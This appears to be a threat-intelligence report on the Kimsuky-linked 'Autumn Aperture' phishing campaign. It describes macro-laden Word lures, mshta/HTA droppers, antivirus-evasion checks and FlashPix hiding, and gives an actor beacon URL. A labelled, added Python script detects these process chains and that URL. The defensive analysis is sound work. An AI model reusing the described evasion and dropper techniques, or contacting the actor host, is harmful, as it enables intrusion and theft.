11 September 2019
Autumn Aperture: Threat Campaign Highlights New Evasion Technique using an Antiquated File Format
In what is assessed to be an expansion of a coordinated effort to target U.S.-based entities, an emerging and increasingly sophisticated campaign employing obscure file formats poses significant risk — and highlights the need for vigilance around third-party relations.
After detecting several related trojanized documents — all discussing nuclear deterrence, North Korea’s nuclear submarine program, and North Korean economic sanctions — Prevailion has determined the existence of a coordinated threat campaign. We have dubbed the campaign “Autumn Aperture” and have associated it — with moderate confidence — with the Kimsuky, a.k.a. “Smoke Screen”, threat actors.
To increase the effectiveness of their campaign, the threat actors obtained documents written by industry experts. The threat actors then appended their malware into these Microsoft Word files. Document metadata indicates that these operations occurred throughout the summer of 2019 with the most recent wave of documents likely being sent around 20 August 2019.
This campaign also denoted an evolution in the threat actors’ techniques, as they shifted to more obscure file formats (Kodak FlashPix), resulting in a significantly lower detection rate by anti-virus (AV) products.
We hypothesize that these documents, sent via a socially engineered email, would have likely been anticipated by the intended victims, thus increasing the threat actors’ chance of success. Some document examples include:
- Trojanizing a conference speaker’s notes after his presentation at the Nuclear Deterrence summit.
- Trojanizing a report from a U.S. university affiliate discussing North Korea’s new ballistic missile submarine (SSB) capabilities.
- Impersonating the U.S. Department of Treasury and sending a renewal notice for a sanctions license.
Autumn Aperture’s increasingly sophisticated tools still employ the use of a common email threat delivery mechanism that can be incorporated into an organization’s risk mitigation plans. Given the scope of entities targeted by this campaign, there is an increased likelihood that a third party within an organization’s ecosystem is at risk of exposure.
Based on the indicators of compromise we’ve collected on Autumn Aperture, we encourage organizations to assess existing risk profiles, review emergency response plans, and ensure that employees know to immediately contact the appropriate IT or network security resource if they are prompted to enable macros on any document.
The most recent document associated with this campaign was titled “NK new SSB shown with Kim 22-7-2019”. Document metadata shows that this document was created by a U.S. based university affiliate and, despite its title, was modified on 20 August by the threat actors.
Consistent with historical trends, the threat actors continued to trojanize genuine documents. Throughout this campaign, when victims viewed the documents in an application, the malware would display a prompt to enable macros. Once macros were enabled, the document would then display the content — in this case, a report on the construction of a new ballistic missile submarine (SSB) facility — while surreptitiously installing additional malware on the victim’s computer.
SSB phishing lure used to target victims
We also discovered another malicious document, likely deployed earlier this summer. This document used the same technique of embedding images with instructions to enable macros.
Once macros were enabled, the user would see a document that appeared to be from the U.S. Treasury Department, which granted the Carnegie Corporation of New York a sanctions license. As before, enabling macros allowed the malware to install additional payloads on the victim’s computer.
North Korea sanctions regulations lure
In one particular case, we identified a Bitly link that was sent to some victims of this campaign. When the Bitly link was expanded, it revealed the shortened actor-controlled URL. Additionally, this expansion page showed how many people clicked the link and when it was clicked. If a victim visited the URL, the resulting webpage would download a RAR file, which contained a trojanized document summarizing a talk from the Nuclear Deterrence summit.
While we observed multiple iterations of this lure, metadata shows that the original document was created by a speaker at the Nuclear Deterrence Summit and then modified by the threat actors. The content of this lure suggests that it was likely targeted towards conference attendees and/or others who had an interest in what took place at the conference.
This particular document was previously referenced in a report by ESTSecurity, and its embedded domain was included in a report by the Agence Nationale de la Sécurité des Systèmes d’Information (ANSSI). This indicates that the Autumn Aperture campaign was likely a continuation of a previously reported activity from this threat group.
Nuclear Deterrence summit lure
Visual Basic Scripts and Kodak FlashPix Format Files
Earlier in 2019, the trojanized documents contained a very small, simple macro that would automatically open, then call mshta.exe to run an executable HTML (HTA) file. The threat actors have since fortified their documents with several new functionalities, such as an added feature to enumerate the host machine, and have experimented with password-protecting their documents.
Another feature would call Windows Management Instrumentation (WMI) to determine if it was safe to obtain the next payload on the host machine. The dropper would obtain a list of running processes and services, then compare that output to a list of known anti-virus products. In July, the script would check for the presence of the following anti-virus products:
- Malwarebytes
- Windows Defender
In August, the threat actors added functionality to also check for:
Screenshot of the anti-detection checks used in the July Campaign
Once the dropper determined that it was safe to run on the host machine, it would perform some host-based enumeration by attempting to obtain stored credentials. As in earlier campaigns, the dropper would use mshta.exe to obtain the HTA payloads hosted on compromised domains. The executable would be saved in %APPDATA%tmp0.bat. The script would then create a scheduled task to run the payload using wscript.exe.
The last new feature of the script would attempt to obtain the application’s version number — in most cases this would likely be the version of Microsoft Word — and then send the result to another actor-compromised domain, pirha[.]net/p/php?op=[version number].
Screenshot of the application version feature
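The behaviours described above (a macro-launched mshta.exe, wscript.exe running tmp0.bat from %APPDATA%, and the version beacon to the /p/php?op= path) can be correlated per host in endpoint and proxy telemetry. The following is an added example, not code from Prevailion's report; the event field names (Host, Image, ParentImage, CommandLine, Url), the Office process list and the sample events are assumptions constructed for illustration.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}  # assumed parent list
# Domain kept defanged as on the page; refanged only for matching.
BEACON_HOST = "pirha[.]net".replace("[.]", ".")
BEACON_RE = re.compile(
    r"^https?://(?:[\w-]+\.)*" + re.escape(BEACON_HOST) + r"/p/php\?op=", re.I)

def classify(event):
    """Return the names of the report's behaviours that one event matches."""
    hits = []
    image = basename(event.get("Image", "")).lower()
    parent = basename(event.get("ParentImage", "")).lower()
    cmd = event.get("CommandLine", "").lower()
    if image == "mshta.exe" and parent in OFFICE:
        hits.append("office_spawns_mshta")
    if "wscript" in cmd and "tmp0.bat" in cmd and "appdata" in cmd:
        hits.append("wscript_runs_tmp0_bat")
    if BEACON_RE.search(event.get("Url", "")):
        hits.append("version_beacon")
    return hits

def triage(events):
    """Group hits per host; two or more distinct behaviours means escalate."""
    per_host = {}
    for ev in events:
        per_host.setdefault(ev["Host"], set()).update(classify(ev))
    return {h: ("escalate" if len(b) >= 2 else "review" if b else "clean",
                sorted(b)) for h, b in per_host.items()}

# Constructed sample events (not taken from the report).
SAMPLE = [
    {"Host": "ws01", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "CommandLine": "mshta.exe http://compromised.example/a.hta"},
    {"Host": "ws01", "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"wscript.exe C:\Users\a\AppData\Roaming\tmp0.bat"},
    {"Host": "ws01", "Url": "http://" + BEACON_HOST + "/p/php?op=16.0"},
    {"Host": "ws02", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe C:\tools\admin.hta"},  # benign admin use
]

if __name__ == "__main__":
    for host, verdict in triage(SAMPLE).items():
        print(host, verdict)
```

Requiring two distinct behaviours before escalating keeps a lone mshta.exe launch from Explorer, as on ws02, out of the alert queue.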
To hide this new functionality, the threat actor embedded it in a Kodak FlashPix file format (FPX). According to VirusTotal testing, the FPX file format has a significantly lower detection rate, dropping the initial detection rate to 8/57 AV products, whereas the standard file format, VBA, had an initial detection rate of 23/57.
Screenshot of the FPX detection rate on 23 July 2019
Screenshot of the VBA detection rate on 9 June 2019
This was likely done because AV products have numerous signatures designed to inspect VBA files, while FPX files have not received the same level of scrutiny. As a result, FPX files are less likely to be subsequently flagged as malicious. We found samples suggesting that the threat actors have been using this file format since at least July.
These threat actors’ TTPs are evolving and continue to be refined with each new operation. While this type of operation did require some user interaction (pressing the macro button), the malware would do the rest in the background, hidden from the victim.
This technique followed a wider trend that we are observing across multiple threat actor groups, in which they socially engineer victims with an image rather than relying on an exploit. Several actors are creating more robust droppers to better protect their tool sets and increase their chances of operating without discovery. These changes reflect a highly motivated threat actor, likely to continue performing operations.
While the TTPs continue to evolve and increase in sophistication, this campaign still relies on a relatively simple but effective email fraud attack method. Business email compromise (BEC) — the traditional document delivery method used for campaign Autumn Aperture — is the leading driver for insurance giant AIG’s Europe, Middle East & Africa (EMEA) region cyber insurance claims.
BEC compromises are a growing threat, up from 11% of AIG EMEA’s reported cyber claims in 2017 to account for 23% in 2018. AIG EMEA’s 2018 cyber claims data indicates a wide range of sectors are vulnerable to BEC attacks, with professional services, financial services, business services, and public entity & non-profit industries accounting for almost 60% of all 2018 claims.
Given the broad scope of entities targeted by Autumn Aperture, there is an increased likelihood that a third party within an organization’s ecosystem is at risk of exposure. Based on this information and the indicators of compromise Prevailion has collected on Autumn Aperture, we encourage organizations to assess existing risk profiles, review emergency response plans, and ensure that employees know to immediately contact the appropriate IT or network security resource if prompted to enable macros on a downloaded document. For more information about threat modeling and 3rd party risk mitigation, attend Elizabeth’s talk on September 12th at the Tactical Edges International CISOs Summit. (1)
(1) Cyber Claims: GDPR and business email compromise drive greater frequencies; https://www.aig.co.uk/content/dam/aig/emea/regional-assets/documents/aig-cyber-claims-2019.pdf
Prevailion is a compromise intelligence company, transforming the way organizations approach risk mitigation and business decision-making. Through next-level tailored intelligence and a zero-touch platform, Prevailion provides confirmed evidence of compromise for customers and their partner ecosystems.